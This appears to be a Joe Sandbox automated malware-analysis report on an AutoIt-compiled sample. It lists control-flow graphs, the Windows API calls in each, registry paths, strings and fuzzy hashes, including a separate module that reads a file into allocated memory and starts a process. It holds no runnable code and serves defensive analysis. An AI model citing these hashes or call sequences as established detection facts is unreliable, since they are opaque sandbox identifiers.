                                                                                                                  • Instruction ID: c604af65577b7913aa6eb5b8a5c50700f4c2b5eff72fb2f1d6c358e22f30df9c
                                                                                                                  • Opcode Fuzzy Hash: 04959d9c0ff2e8e2f2ef5e04d9fbd9356b5cba01461293cb2e72773bf7a70618
                                                                                                                  • Instruction Fuzzy Hash: D742D570604341EFD729CF24C899BAABBF9FF45304F14495DE456872A2EB71E848CB92

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00AB2D07
                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00AB2D31
                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB2D42
                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00AB2D5F
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB2D6F
                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00AB2D85
                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB2D94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                  • Opcode ID: a178579d14e3af6201386424eff42e49c4f48c768659e167c261f4f32d8ddd7f
                                                                                                                  • Instruction ID: c335766e2587896cf88d4acafcf4dfc3ea088b3ac86afc4349aedaeea1f7088f
                                                                                                                  • Opcode Fuzzy Hash: a178579d14e3af6201386424eff42e49c4f48c768659e167c261f4f32d8ddd7f
                                                                                                                  • Instruction Fuzzy Hash: 7221B2B5912218AFDB40DFA8EC49BDDBFB8FB09B00F00451AE511A72A0DBB14645CF95

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AF039A: CreateFileW.KERNELBASE(00000000,00000000,?,00AF0704,?,?,00000000,?,00AF0704,00000000,0000000C), ref: 00AF03B7
                                                                                                                  • GetLastError.KERNEL32 ref: 00AF076F
                                                                                                                  • __dosmaperr.LIBCMT ref: 00AF0776
                                                                                                                  • GetFileType.KERNELBASE(00000000), ref: 00AF0782
                                                                                                                  • GetLastError.KERNEL32 ref: 00AF078C
                                                                                                                  • __dosmaperr.LIBCMT ref: 00AF0795
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AF07B5
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00AF08FF
                                                                                                                  • GetLastError.KERNEL32 ref: 00AF0931
                                                                                                                  • __dosmaperr.LIBCMT ref: 00AF0938
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                  • Opcode ID: 1782616288ecd6b560729be7187aa1e1c0fed6f2b4036d74af3e975433d7ff12
                                                                                                                  • Instruction ID: 445e93f932dda3c5729808a8cc8a1ba553a28363c77103828e0822ce22abbdd6
                                                                                                                  • Opcode Fuzzy Hash: 1782616288ecd6b560729be7187aa1e1c0fed6f2b4036d74af3e975433d7ff12
                                                                                                                  • Instruction Fuzzy Hash: 51A12736A101088FDF19AFA8D851BBE7BA0AF06320F144159F916DF3A2DB359D12CB91

Control-flow Graph

APIs
  • Part of subcall function 00AB3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B81418,?,00AB2E7F,?,?,?,00000000), ref: 00AB3A78
  • Part of subcall function 00AB3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AB3379
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AB356A
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AF318D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AF31CE
• RegCloseKey.ADVAPI32(?), ref: 00AF3210
• _wcslen.LIBCMT ref: 00AF3277
• _wcslen.LIBCMT ref: 00AF3286
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
• Opcode ID: 47590424372325082d5b0b21f8f058b565d361c1342ed75f840f839823cd9616
• Instruction ID: 1bacc9b9cf3357b88c8e26361eb4cbc00392f17905dd5b1524b94127dae455bc
• Opcode Fuzzy Hash: 47590424372325082d5b0b21f8f058b565d361c1342ed75f840f839823cd9616
• Instruction Fuzzy Hash: 4071B0724053049EC714EF69ED929ABBBE8FF99740F40092EF54583271EF349A48CB56

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00AB2B8E
• LoadCursorW.USER32(00000000,00007F00), ref: 00AB2B9D
• LoadIconW.USER32(00000063), ref: 00AB2BB3
• LoadIconW.USER32(000000A4), ref: 00AB2BC5
• LoadIconW.USER32(000000A2), ref: 00AB2BD7
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AB2BEF
• RegisterClassExW.USER32(?), ref: 00AB2C40
  • Part of subcall function 00AB2CD4: GetSysColorBrush.USER32(0000000F), ref: 00AB2D07
  • Part of subcall function 00AB2CD4: RegisterClassExW.USER32(00000030), ref: 00AB2D31
  • Part of subcall function 00AB2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB2D42
  • Part of subcall function 00AB2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00AB2D5F
  • Part of subcall function 00AB2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB2D6F
  • Part of subcall function 00AB2CD4: LoadIconW.USER32(000000A9), ref: 00AB2D85
  • Part of subcall function 00AB2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB2D94
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 03509d16b3615fd8465caf10f5990e6b1e2eb75aade16404c6cfb281ac4a7a33
• Instruction ID: 9eee59bfc91cc671d8ddb0131c9c36ed0f3284e80839894a8fcbd7e435a12689
• Opcode Fuzzy Hash: 03509d16b3615fd8465caf10f5990e6b1e2eb75aade16404c6cfb281ac4a7a33
• Instruction Fuzzy Hash: C9211875E02318BBDB10DFA9EC55AA97FB8FB48B50F00041AE500A76B0DBB14A51CF98

Control-flow Graph

APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00AB316A,?,?), ref: 00AB31D8
• KillTimer.USER32(?,00000001,?,?,?,?,?,00AB316A,?,?), ref: 00AB3204
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AB3227
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00AB316A,?,?), ref: 00AB3232
• CreatePopupMenu.USER32 ref: 00AB3246
• PostQuitMessage.USER32(00000000), ref: 00AB3267
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: b1e8bf0a314d6e42d2556ac1f841c22946406974dc8856bf3e7c4e0d137ad67d
• Instruction ID: 71e116172ca3ab241165926d6cd481993272f7b458a9ee651a90fc0a95bd3dbe
• Opcode Fuzzy Hash: b1e8bf0a314d6e42d2556ac1f841c22946406974dc8856bf3e7c4e0d137ad67d
• Instruction Fuzzy Hash: CB41D437241208A7DF146BACDD1ABF93A6DEB15340F040655F601862B3CF718E42E765

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8d656d5dbd9d472ec0c505232867f66f586808164052275b509949b69a5558c
• Instruction ID: 217950d0a25a1e5a64facdce853bc66541b5c70cfd356a5078a0252d04befc57
• Opcode Fuzzy Hash: a8d656d5dbd9d472ec0c505232867f66f586808164052275b509949b69a5558c
• Instruction Fuzzy Hash: 1EC1F374904389AFDF11EFAAC841BEEBBB4BF19310F444199F519AB392CB349941CB61

Control-flow Graph

APIs
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0180C40D
Memory Dump Source
• Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction ID: 1a18d5b6c8f6bf833df4ba3dc9e955f00acf9198a66b8cdca37b6d189ac39a90
• Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction Fuzzy Hash: 5651D875A50208BBEB60DFA4CC89FEE7778BF48701F108654F61AEA1C0DB75A6448B64

Control-flow Graph: ab2c63-ab2cd3 (CreateWindowExW * 2, ShowWindow * 2)
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AB2C91
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AB2CB2
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00AB1CAD,?), ref: 00AB2CC6
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00AB1CAD,?), ref: 00AB2CCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 54957b523708663c4f85e368ef9ece89839c2278b987d7f64118f4b9230a536b
• Instruction ID: 606a9cf46ace14d44af5da78bac1fb655fac20bf4e7db6d2ab844fabd0db7b5f
• Opcode Fuzzy Hash: 54957b523708663c4f85e368ef9ece89839c2278b987d7f64118f4b9230a536b
• Instruction Fuzzy Hash: CAF0DA755423907AEB711B1BAC08EB72EBDE7C7F50B00045AF904A35B0CA755852DBB9

Control-flow Graph

APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B22C05
• DeleteFileW.KERNEL32(?), ref: 00B22C87
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B22C9D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B22CAE
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B22CC0
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
• Opcode ID: bfbc2aa941a9e873a19780bf12ff833740ef84f4b8b9ade18a02de3ca82d998d
• Instruction ID: 320846755b1f7f07ac7ebcdf932417157cf42930ce2c33b445d0729a460c66d9
• Opcode Fuzzy Hash: bfbc2aa941a9e873a19780bf12ff833740ef84f4b8b9ade18a02de3ca82d998d
• Instruction Fuzzy Hash: 8DB15F71D00129ABDF21EFA4DD85EEEBBBDEF49350F1040A6F509E7251EA309A448F61

Control-flow Graph: 180de68-180e087 (call 180baa8, call 180dd58, CreateFileW, VirtualAlloc, ReadFile, call 180cb18, call 180dd98, call 180cd58, call 180dde8)
APIs
  • Part of subcall function 0180DD58: Sleep.KERNELBASE(000001F4), ref: 0180DD69
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0180DFA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: PQKJ3SVGUPLLH56F
• API String ID: 2694422964-2817001817
• Opcode ID: 474a1a3ef0b78a243a3f22f839876c7055a42d0ffcedeafc37c44ac54e1feced
• Instruction ID: 38dec1243c20ddeb3164a1e81aa830787974776b79afdca4b57f759ec206827e
• Opcode Fuzzy Hash: 474a1a3ef0b78a243a3f22f839876c7055a42d0ffcedeafc37c44ac54e1feced
• Instruction Fuzzy Hash: 8D515F30D1424CDBEB12DBE4C854BEEBB79AF59300F004599E649BB2C0D7B91B45CBA6

Control-flow Graph: ab3b1c-ab3b9b (RegOpenKeyExW, RegQueryValueExW, RegCloseKey)
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AB3B0F,SwapMouseButtons,00000004,?), ref: 00AB3B40
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AB3B0F,SwapMouseButtons,00000004,?), ref: 00AB3B61
• RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00AB3B0F,SwapMouseButtons,00000004,?), ref: 00AB3B83
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 6d6f9b3b949436831775a1461239e514f9683e53a85d23bc6332ea4a84dbb62a
• Instruction ID: 6c760a485b9d36defbacbcc8e1c7abaf94e9e230b7af58c5f23e26880fbee623
• Opcode Fuzzy Hash: 6d6f9b3b949436831775a1461239e514f9683e53a85d23bc6332ea4a84dbb62a
• Instruction Fuzzy Hash: 5A112AB6511208FFDF218FA5DC44AEEBBBCEF05744B104559A806D7215D6719F409760
Strings
• Variable must be of type 'Object'., xrefs: 00B032B7
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
• Opcode ID: f6f491a61dc1bbd64d9ae6d781d851f06809476f83a8fcf9b427e7f7975fa3ee
• Instruction ID: 54de216988f872267d9993daf89a4e8de664a66e5ed0f038c4fd656954b8ce45
• Opcode Fuzzy Hash: f6f491a61dc1bbd64d9ae6d781d851f06809476f83a8fcf9b427e7f7975fa3ee
• Instruction Fuzzy Hash: 74C26675A00214CFCB24CF98C885AEDB7F9FB18700F248569E916AB3A2D775AD41CB91
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0668
  • Part of subcall function 00AD32A4: RaiseException.KERNEL32(?,?,?,00AD068A,?,00B81444,?,?,?,?,?,?,00AD068A,00AB1129,00B78738,00AB1129), ref: 00AD3304
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0685
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: df11dc8a959909ea413779a1e4add2fa383deda6af7c5fead9bdc9294348b0bd
• Instruction ID: 969b786e9124faee56b1e9cbfb88ebe5fda6b3785513dfa781965fb2c5c7fb0b
• Opcode Fuzzy Hash: df11dc8a959909ea413779a1e4add2fa383deda6af7c5fead9bdc9294348b0bd
• Instruction Fuzzy Hash: 48F0C23490020D7BCF00BB64E94AE9E77BD5E00354F608176B82AD66A5EF71DB25C581
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0180CAED
• ExitProcess.KERNEL32(00000000), ref: 0180CB0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
Similarity
• API ID: Process$CreateExit
• String ID: D
• API String ID: 126409537-2746444292
• Opcode ID: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
• Instruction ID: 96682a2eabe773ab9ee4ce573802fd000a80009618ec78e1b817eea4ead0bf19
• Opcode Fuzzy Hash: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
• Instruction Fuzzy Hash: 32F0ECB554024CABDB60EFE4CD49FEE7778BF04701F508908FA4ADA180DB7496088B61
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B2302F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B23044
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: 7fd593ff9066f0a31beda7e9878ebab7e77cb630607fbd90689bcda53e600888
• Instruction ID: 6697bb3c676793916f5f401a2332c3cbb9628cac6667cebda2c4ed3fe65b2115
• Opcode Fuzzy Hash: 7fd593ff9066f0a31beda7e9878ebab7e77cb630607fbd90689bcda53e600888
• Instruction Fuzzy Hash: ECD05E7650132867DA60A7A4AC0EFCB3F6CEB05B50F0002A1B655E30A1DEF09A84CAD4
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B382F5
                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00B382FC
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00B384DD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 146820519-0
                                                                                                                  • Opcode ID: 95d1bc9f9988e4ba6c6ff1f6a0b4457e76e854a8c32a76884d1ce4b5ab671f2b
                                                                                                                  • Instruction ID: aa8e9f7b6f6735ebe966120171d0c52bae6f5b01fccc53e0b6ead220bd07ea57
                                                                                                                  • Opcode Fuzzy Hash: 95d1bc9f9988e4ba6c6ff1f6a0b4457e76e854a8c32a76884d1ce4b5ab671f2b
                                                                                                                  • Instruction Fuzzy Hash: 4B126A71A083419FC724DF28C584B6ABBE5FF89314F14899DF8898B352DB31E945CB92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f475fa7e3f0faf9041ce0e70a19e25d1911ddee3a91ecbf7dc57253d4e633ad2
                                                                                                                  • Instruction ID: 65ee9b71029230881835b103fef60bc76746ba6840d394cb6bb4016e2ca78031
                                                                                                                  • Opcode Fuzzy Hash: f475fa7e3f0faf9041ce0e70a19e25d1911ddee3a91ecbf7dc57253d4e633ad2
                                                                                                                  • Instruction Fuzzy Hash: 7251D375D006899FCB109FBAE945FEFBBB8AF45318F24005AF406A7292D7719A01CB61
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AB1BF4
